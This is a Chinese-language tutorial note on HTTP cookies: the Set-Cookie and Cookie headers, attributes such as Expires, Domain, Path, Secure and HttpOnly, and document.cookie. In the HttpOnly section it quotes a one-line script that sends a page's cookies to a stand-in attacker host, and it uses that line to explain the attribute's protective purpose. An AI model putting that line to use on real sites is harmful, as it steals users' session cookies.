cookie
(一) cookie概述
Cookie 是服务器保存在浏览器的一小段文本信息,每个 Cookie 的大小一般不能超过4KB。浏览器每次向服务器发出请求,就会自动附上这段信息。
- cookie是服务器保存在浏览器的一小段文本信息
- 浏览器每次向服务器发出请求,就会自动附上这段信息
cookie的主要作用
cookie的主要作用:
- 分辨两个请求,是否来自同一个浏览器
- 保存一些状态信息
(登陆信息,购物车信息,颜色,字体,等)
查看浏览器是否打开cookie功能
window.navigator.cookieEnabled属性返回一个布尔值,表示浏览器是否打开 Cookie 功能。
window.navigator.cookieEnabld // 返回一个布尔值,表示浏览器是否打开cookie功能
document.cookie
返回当前网页的cookie
document.cookie
cookie的生成 ------------------- http回应头信息
服务器如果希望在浏览器保存 Cookie,就要在 HTTP 回应的头信息里面,放置一个Set-Cookie字段。
- 服务器如果想在浏览器中保存cookie,就要在HTTP回应的头部信息里,放置一个 Set-Cookie字段
- HTTP 回应可以包含多个Set-Cookie字段,即在浏览器生成多个 Cookie。
- 除了 Cookie 的值,Set-Cookie字段还可以附加 Cookie 的属性
- 一个Set-Cookie字段里面,可以同时包括多个属性,没有次序的要求。
- 如果服务器想改变一个早先设置的 Cookie,必须同时满足四个条件:Cookie 的key、domain、path和secure都匹配。只要有一个属性不同,就会生成一个全新的 Cookie,而不是替换掉原来那个 Cookie。
Set-Cookie:foo=bar // 在http回应 的头部信息里面设置
上面代码会在浏览器保存一个名为foo的 Cookie,它的值为bar
------------------------------------------
HTTP 回应可以包含多个Set-Cookie字段,即在浏览器生成多个 Cookie
HTTP/1.0 200 OK
Content-type: text/html
Set-Cookie: yummy_cookie=choco // http回应的头部中可以有多个Set-Cookie
Set-Cookie: tasty_cookie=strawberry
[page content]
------------------------------------------
除了 Cookie 的值,Set-Cookie字段还可以附加 Cookie 的属性
Set-Cookie: <cookie-name>=<cookie-value>; Expires=<date> // expires属性,失效时间,GMT格式
Set-Cookie: <cookie-name>=<cookie-value>; Max-Age=<non-zero-digit> // Max-age有效时长
Set-Cookie: <cookie-name>=<cookie-value>; Domain=<domain-value> // 域名
Set-Cookie: <cookie-name>=<cookie-value>; Path=<path-value> // 路径
Set-Cookie: <cookie-name>=<cookie-value>; Secure // 安全,只有https协议下可以发送cookie到服务器
Set-Cookie: <cookie-name>=<cookie-value>; HttpOnly // 指定cookie无法通过js脚本拿到
------------------------------------------
一个Set-Cookie字段里面,可以同时包括多个属性,没有次序的要求。
Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure; HttpOnly
------------------------------------------
如果服务器想改变一个早先设置的 Cookie,必须同时满足四个条件:Cookie 的key、domain、path和secure都匹配
Set-Cookie: key1=value1; domain=example.com; path=/blog 【【【 原始的Cookie 】】】
改变上面这个 Cookie 的值,就必须使用同样的Set-Cookie
Set-Cookie: key1=value2; domain=example.com; path=/blog 【【【 服务器改变Cookie 】】】
// 【浏览器改变cookie】必须设置 Expires 为过去的时间
-------------------------------------------------------------------------------
只要有一个属性不同,就会生成一个全新的 Cookie,而不是替换掉原来那个 Cookie。
Set-Cookie: key1=value2; domain=example.com; path=/
上面的命令设置了一个全新的同名 Cookie,但是path属性不一样。
下一次访问example.com/blog的时候,浏览器将向服务器发送两个同名的 Cookie。
----
Cookie: key1=value1; key1=value2
上面代码的两个 Cookie 是同名的,匹配越精确的 Cookie 排在越前面。
cookie的发送 ------------------- http请求头信息
浏览器向服务器发送 HTTP 请求时,每个请求都会带上相应的 Cookie。也就是说,把服务器早前保存在浏览器的这段信息,再发回服务器。这时要使用 HTTP 头信息的Cookie字段。
- cookie的发送,使用 HTTP头信息的 Cookie 字段
- Cookie字段可以包含多个 Cookie,使用分号(;)分隔。
-
服务器收到浏览器发来的 Cookie 时,有两点是无法知道的:
(1) Cookie 的各种属性,比如何时过期。
(2) 哪个域名设置的 Cookie,到底是一级域名设的,还是某一个二级域名设的
Cookie: foo=bar
上面代码会向服务器发送名为foo的 Cookie,值为bar。
---------------------------------
Cookie字段可以包含多个 Cookie,使用分号(;)分隔。
Cookie: name=value; name2=value2; name3=value3
---------------------------------
GET /sample_page.html HTTP/1.1
Host: www.example.org
Cookie: yummy_cookie=choco; tasty_cookie=strawberry
生成cookie-响应头;发送cookie-请求头
cookie注意事项
浏览器可以设置不接受 Cookie,也可以设置不向服务器发送 Cookie。
浏览器的同源政策规定,两个网址只要域名相同和端口相同,就可以共享 Cookie
注意,这里不要求协议相同。也就是说,http://example.com设置的 Cookie,可以被https://example.com读取。Cookie 由 HTTP 协议生成,也主要是供 HTTP 协议使用。
(二) cookie的属性
Expires
expires属性指定一个具体的到期时间,到了指定的时间后,浏览器将不再保留这个cookie
expires的值是UTC格式,可以使用 Date.prototype.toUTCString() 进行格式转换
- expires:失效,到期,的意思
- 如果不设置 expires 属性,或者设为null,Cookie只在当前会话(session)有效,浏览器窗口一旦关闭,当前 Session 结束,该 Cookie 就会被删除。
- 浏览器是根据本地时间,决定 cookie 是否过期,由于本地时间是不精确的,所以没有办法保证 cookie 一定会在服务器指定的时间过期
Max-Age
Max-Age属性 指定从现在开始,cookie存在的秒数,过了这个时间后,浏览器将不会保留这个cookie
Expires 和 Max-Age
如果同时指定了 Expires 和 Max-Age ,那么 Max-Age 将优先生效
- 如果Set-Cookie字段没有指定Expires或Max-Age属性,那么这个 Cookie 就是 Session Cookie,即它只在本次对话存在,一旦用户关闭浏览器,浏览器就不会再保留这个 Cookie。
- https://blog.csdn.net/u012860063/article/details/58076403
Domain
Domain 属性指定,浏览器发出HTTP请求时,哪些域名要附带这个Cookie
- domain:是域名,领土的意思
- 如果没有指定Domain属性,浏览器将默认将其设为当前URL的一级域名
比如www.example.com会设为example.com,而且以后如果访问example.com的任何子域名,HTTP 请求也会带上这个 Cookie。 - 如果服务器在Set-Cookie字段指定的域名,不属于当前域名,浏览器会拒绝这个 Cookie。
Path
Path 属性指定,浏览器发出HTTP请求时,哪些路径要附带这个Cookie
- 只要浏览器发现,Path属性是 HTTP 请求路径的开头一部分,就会在头信息里面带上这个 Cookie。
比如,PATH属性是/,那么请求/docs路径也会包含该 Cookie。当然,前提是域名必须一致。
Secure
Secure 属性指定,浏览器只有在加密协议 HTTPS 下,才能将这个 Cookie 发送到服务器。
- Secure:是安全的意思
- 如果当前协议是 HTTP,浏览器会自动忽略服务器发来的Secure属性。该属性只是一个开关,不需要指定值。如果通信是 HTTPS 协议,该开关自动打开。
HttpOnly ------------------ 重要
- HttpOnly属性指定该 Cookie 无法通过 JavaScript 脚本拿到,主要是Document.cookie属性、XMLHttpRequest对象和 Request API 都拿不到该属性。这样就防止了该 Cookie 被脚本读到,只有浏览器发出 HTTP 请求时,才会带上该 Cookie。
(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;
上面是跨站点载入的一个恶意脚本的代码,能够将当前网页的 Cookie 发往第三方服务器。
如果设置了一个 Cookie 的HttpOnly属性,上面代码就不会读到该 Cookie。
document.cookie
document.cookie属性用于读写当前网页的 Cookie。
- 读取的时候,它会返回当前网页的所有 Cookie,前提是该 Cookie 不能有HTTPOnly属性。多个cookie之间,用
;分号分隔 - document.cookie属性是可写的,可以通过它为当前网站添加 Cookie。
- 写入的时候,Cookie 的值必须写成key=value的形式
( 注意,等号两边不能有空格 ) - 写入 Cookie 的时候,必须对分号、逗号和空格进行转义(它们都不允许作为 Cookie 的值),这可以用encodeURIComponent方法达到。
- document.cookie一次只能写入一个 Cookie,而且写入并不是覆盖,而是添加。
添加cookie
document.cookie = 'name=wang' // key=value的字符串
document.cookie = 'test1=hello';
document.cookie = 'test2=world';
document.cookie
// test1=hello;test2=world
document.cookie读写行为的差异:
(一次可以读出全部 Cookie,但是只能写入一个 Cookie),与 HTTP 协议的 Cookie 通信格式有关。
浏览器向服务器发送 Cookie 的时候,Cookie字段是使用一行将所有 Cookie 全部发送;
服务器向浏览器设置 Cookie 的时候,Set-Cookie字段是一行设置一个 Cookie。
- 写入 Cookie 的时候,可以一起写入 Cookie 的属性。
document.cookie = "foo=bar; expires=Fri, 31 Dec 2020 23:59:59 GMT";
上面代码中,写入 Cookie 的时候,同时设置了expires属性。属性值的等号两边,也是不能有空格的。
各个属性的写入注意点如下。
各个属性的写入注意点如下。
- path属性必须为绝对路径,默认为当前路径。
- domain属性值必须是当前发送 Cookie 的域名的一部分。比如,当前域名是-
example.com,就不能将其设为foo.com。该属性默认为当前的一级域名(不含二级域名)。 - max-age属性的值为秒数。
- expires属性的值为 UTC 格式,可以使用Date.prototype.toUTCString()进行日期格式转换。
document.cookie = 'fontSize=14; '
+ 'expires=' + someDate.toGMTString() + '; '
+ 'path=/subdirectory; '
+ 'domain=*.example.com';
删除一个cookie的值
- 删除一个现存 Cookie 的唯一方法,是设置它的expires属性为一个过去的日期
添加cookie:
document.cookie = 'name=wu'
删除cookie:
document.cookie = 'name=wu;expires=Thu, 01-Jan-1970 00:00:01 GMT';
上面代码中,名为fontSize的 Cookie 的值为wu,过期时间设为1970年1月1月零点,就等同于删除了这个 Cookie。
